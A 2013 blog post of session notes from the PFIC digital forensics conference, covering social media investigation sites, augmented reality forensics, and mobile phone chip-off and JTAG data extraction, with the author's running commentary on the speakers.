Thursday, November 14, 2013

Daly Bog #144 PFIC Day 1 Afternoon Sessions

Hello Reader,
          I took more notes yesterday and I'm taking more notes this morning. I'm posting these in the hopes that you'll use them with the slides that will be posted so you can get the information presented here that is outside of the slides.

1:30pm Session Social Media Insights

This session was being presented by a woman whose company provide PI services and specifically online research about people and companies.
Websites and techniques for social media investigations
Finding links and images through duckduckgo
Finding discussion posts on omgili
Finding classified ads with searchtempest
Using ixquick to search multiple engines and find hits in the 'private web' with a meta search
I left for a conference call at this point, if you need to do online/social/web investigations of prior post this presentation does give some good links.

2:30pm Session Augmented Reality Forensics

This wasn't a forensic session per se, its more of a futurist looking at the state of upcoming and emerging technology and what that may mean for us in the DFIR field.. Still an interesting talk from a good presenter.
AR isn't perfect yet
will make a new range of forensic tools and forensic possibilities
The internet of things is coming and with it IoT forensics

4:00pm Session Chip Off or Jtag it

This was an interesting session mainly because of Zeke's personality but the tech content was a bit light for a conference that also had a hands on chip off lab taking place a few doors down.
 
New Zeland accents make presentations more interesting
Good jokes so far, hoping the content is as good
Overview of crimes committed and the evidence that could be found on mobile devices
Terrorists are now shooting their phones before being caught, apparently you should target the number 7 key to kill the sim and possibly the nvram chip.
Starting his review of forensics with Edmond Locard 'every contact leaves a trace'
now comparing computer v cell phone forensics, I'm going to be patient but I'm wondering if he is misjudging his audience.
A little vendor bashing on how they market their logical/physical analysis, always appreciated
'forensic explorer' is now called 'recover my files' which is around $1,000 USD and he has had good success in carving from android unallocated. Not sure how that compares to any other carving tool against the same data.
Flasher boxes are hacker boxes and break into devices? I don't think I agree with the analogy but I understand the meaning.
Discussion on if these procedures from a flasher box, jtag, chip off, and even vendor software tools are forensically sound since many are modifying the original evidence in order to extract the data
The process is what makes something forensically sound not the tool, I agree
He is now going over photographing a phone as a first step before cracking it open.
Now getting into something interesting, a survey of flasher boxes
The comedy here is winning the audience, enjoying this
Now discussing chip off, and discussing heat versus infrared for removing chips
Why would we go to chip off, because the phone isn't supported by any automated forensic software tool
Some phones, especially the off market clone phones (fake blackberry in this example) may appear normal but will actually be encrypted or having multiple sub systems making normal chip off unhelpful or pointless
Next example is a phone that looks like a remote car key fob
moving on to physically damaged phones
The speaker seems to think that Jonathan Rajewski and I are part of a Utah based cell phone forensics lab.  We can't bear to tell him we are not so we are going along with it.
Regardless of content come see Zeke just for the jokes
Sometimes repair is all you need to do instead of a chip off
Now showing generic best practice guidelines for the UK and USA
Discussing how flasher boxes and other types of phone modifications tools don't have forensic hashes as they were not made for this work, suggested putting the evidence in a forensic image afterwords to allow for verification after the fact.
Discussion of dealing with binary dumps from flashers/jtag/chip off dumps. Common methods are just feeding it to cell phone tools that will carve for known cell patterns.
this presentation is now getting a bit trippy with perspective art/illusions
Breaking down binary patterns as a method for determining data structures
discussion on bypassing android lock phones
if usb debugging is on turned on then your standard tools an get access to the file system
if not moving on to chip off and the destructive process
Moving on to JTAG and showing the 'riff' box which supports multiple pin outs
Youtube is the database for learning how to take phones apart and find jtags
Showing how the raw dump of the jtag output is a large hex dump, showing putting it into forensic explorer again
discussing using rainbow tables of possible sha1 gesture keys to determine which pattern locked the phone
Get the pattern lock and then pull the data off the phone using an automated solution to pull the intact file system for you is his recommendation.

That was day 1, that evening was casino night which is a lot of fun. One of the best parts of PFIC is that it isn't a huge conference and at things like casino night you have a couple hours of fun to mingle with your peers and make new friends.